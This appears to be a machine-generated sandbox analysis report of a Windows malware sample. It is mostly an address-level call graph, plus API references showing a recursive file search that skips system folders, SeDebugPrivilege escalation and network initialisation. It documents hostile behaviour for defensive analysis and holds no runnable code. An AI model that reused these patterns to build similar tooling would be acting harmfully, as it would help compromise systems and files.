405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 FindCloseChangeNotification 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9685 404d04 9678->9685 9679 404dcc 9680 404a39 5 API calls 9679->9680 9680->9676 9681 404dc6 9682 402bab 2 API calls 9681->9682 9682->9679 9683 402b7c 2 API calls 9683->9685 9684 404b8f 5 API calls 9684->9685 9685->9679 9685->9681 9685->9683 9685->9684 9686 404a39 5 API calls 9685->9686 9687 405b6f 6 API calls 9685->9687 9688 404cbf 8 API calls 9685->9688 9689 402bab GetProcessHeap HeapFree 9685->9689 9686->9685 9687->9685 9688->9685 9689->9685 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9694 404cbf 8 API calls 9692->9694 9702 40f115 9692->9702 9693 41219c 14 API calls 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9702 9702->9693

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                                APIs
                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID: %s\%s$%s\*$Program Files$Windows
                                                • API String ID: 1690352074-2009209621
                                                • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 3615134276-2896544425
                                                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateProcess
                                                • String ID:
                                                • API String ID: 1357844191-0
                                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
